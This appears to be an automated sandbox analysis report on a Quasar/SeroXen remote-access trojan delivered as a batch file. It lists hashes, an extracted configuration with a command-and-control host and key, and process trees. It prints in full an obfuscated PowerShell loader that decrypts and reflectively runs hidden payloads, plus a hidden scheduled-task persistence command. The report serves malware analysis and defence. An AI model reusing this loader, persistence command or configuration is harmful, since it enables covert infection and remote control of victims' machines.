Analysis
max time kernel: 34s
max time network: 57s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 21-05-2024 20:12
Static task: static1
Behavioral task: behavioral1
Sample: $sxr-Uni.bat
Resource: win10-20240404-en
Behavioral task: behavioral2
Sample: $sxr-Uni.bat
Resource: win10v2004-20240426-en
General
Target: $sxr-Uni.bat
Size: 1004KB
MD5: 87135909ef2fbb7168cd05d0e39fa129
SHA1: 1c2a864813a5cf5fb12a3e92f80c8ea90b5d7799
SHA256: 38050d3e9a2d09088d05a9a586ad93d139c84439ae995d42cbbaed70fdd77ea7
SHA512: 93475323429a7084902ba12d8ae8ba006de046dfcce62d7acd219f4ec856e561b3f1b036661a52de1950359a61dc1dd8fc52c8b3ea8e1756be04ae0a071ac547
SSDEEP: 24576:Aj9+DnG6YVMFMTnd9x6osRvWc2mjJRiW7+wjHRjX:NGppndjT6dxjX
Malware Config
Extracted
quasar
reconnect_delay: 3000
Extracted
quasar
3.1.5
SeroXen
uk2.localto.net:3362
$Sxr-CHcUwDREE2aL5huOTd
encryption_key: 8v1KwkaFypjEiZ1Virk0
install_name: Client.exe
log_directory: $sxr-cmd
reconnect_delay: 3000
startup_key: Quasar Client Startup
subdirectory: SubDir
Signatures
-
Quasar payload 4 IoCs
Processes:
resource | yara_rule
behavioral3/memory/2068-22-0x0000000007DA0000-0x0000000007E92000-memory.dmp | family_quasar
behavioral3/memory/3904-80-0x000000000A3C0000-0x000000000A42C000-memory.dmp | family_quasar
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe | family_quasar
behavioral3/memory/1780-100-0x00000000006C0000-0x000000000072C000-memory.dmp | family_quasar
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
pid | process
2068 | powershell.exe
3220 | powershell.exe
3904 | powershell.exe
-
Executes dropped EXE 1 IoCs
Processes:
pid | process
1780 | $sxr-Uni.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
1 | ip-api.com
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | wermgr.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | wermgr.exe
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | wermgr.exe
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | powershell.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
pid | process
2068 | powershell.exe
2068 | powershell.exe
3220 | powershell.exe
3220 | powershell.exe
3904 | powershell.exe
3904 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
1780 | $sxr-Uni.exe
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
description | pid | process | target process
PID 2924 wrote to memory of 2068 | 2924 | cmd.exe | powershell.exe
PID 2924 wrote to memory of 2068 | 2924 | cmd.exe | powershell.exe
PID 2924 wrote to memory of 2068 | 2924 | cmd.exe | powershell.exe
PID 2068 wrote to memory of 3220 | 2068 | powershell.exe | powershell.exe
PID 2068 wrote to memory of 3220 | 2068 | powershell.exe | powershell.exe
PID 2068 wrote to memory of 3220 | 2068 | powershell.exe | powershell.exe
PID 2068 wrote to memory of 2792 | 2068 | powershell.exe | WScript.exe
PID 2068 wrote to memory of 2792 | 2068 | powershell.exe | WScript.exe
PID 2068 wrote to memory of 2792 | 2068 | powershell.exe | WScript.exe
PID 2792 wrote to memory of 3548 | 2792 | WScript.exe | cmd.exe
PID 2792 wrote to memory of 3548 | 2792 | WScript.exe | cmd.exe
PID 2792 wrote to memory of 3548 | 2792 | WScript.exe | cmd.exe
PID 3548 wrote to memory of 3904 | 3548 | cmd.exe | powershell.exe
PID 3548 wrote to memory of 3904 | 3548 | cmd.exe | powershell.exe
PID 3548 wrote to memory of 3904 | 3548 | cmd.exe | powershell.exe
PID 3904 wrote to memory of 1780 | 3904 | powershell.exe | $sxr-Uni.exe
PID 3904 wrote to memory of 1780 | 3904 | powershell.exe | $sxr-Uni.exe
PID 3904 wrote to memory of 1780 | 3904 | powershell.exe | $sxr-Uni.exe
PID 3904 wrote to memory of 1820 | 3904 | powershell.exe | wermgr.exe
PID 3904 wrote to memory of 1820 | 3904 | powershell.exe | wermgr.exe
PID 3904 wrote to memory of 1820 | 3904 | powershell.exe | wermgr.exe
Processes
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID: 2924
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2068
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_527_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_527.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3220
-
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_527.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID: 2792
-
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_527.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID: 3548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZuUSVdDzzqEQUY+YLsQ5Gj5wKfn0tqq012ohBylrVEE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vggS0zw77JyIF8H43aLbbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GZkhM=New-Object System.IO.MemoryStream(,$param_var); $oEEbG=New-Object System.IO.MemoryStream; $cBLwn=New-Object System.IO.Compression.GZipStream($GZkhM, [IO.Compression.CompressionMode]::Decompress); $cBLwn.CopyTo($oEEbG); $cBLwn.Dispose(); $GZkhM.Dispose(); $oEEbG.Dispose(); $oEEbG.ToArray();}function execute_function($param_var,$param2_var){ $YTJuF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BaFCg=$YTJuF.EntryPoint; $BaFCg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_527.bat';$pjodI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_527.bat').Split([Environment]::NewLine);foreach ($SxOOI in $pjodI) { if ($SxOOI.StartsWith(':: ')) { $tIbAV=$SxOOI.Substring(3); break; }}$payloads_var=[string[]]$tIbAV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID: 3904
-
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe
"C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID: 1780
-
C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3904" "2652" "2304" "2644" "0" "0" "2660" "0" "0" "0" "0" "0"
6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID: 1820
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize: 2KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 17KB
-
C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.exe
Filesize: 409KB
-
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize: 164KB
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44ueie3s.2m4.ps1
Filesize: 60B
-
C:\Users\Admin\AppData\Roaming\startup_str_527.bat
Filesize: 1004KB
-
C:\Users\Admin\AppData\Roaming\startup_str_527.vbs
Filesize: 115B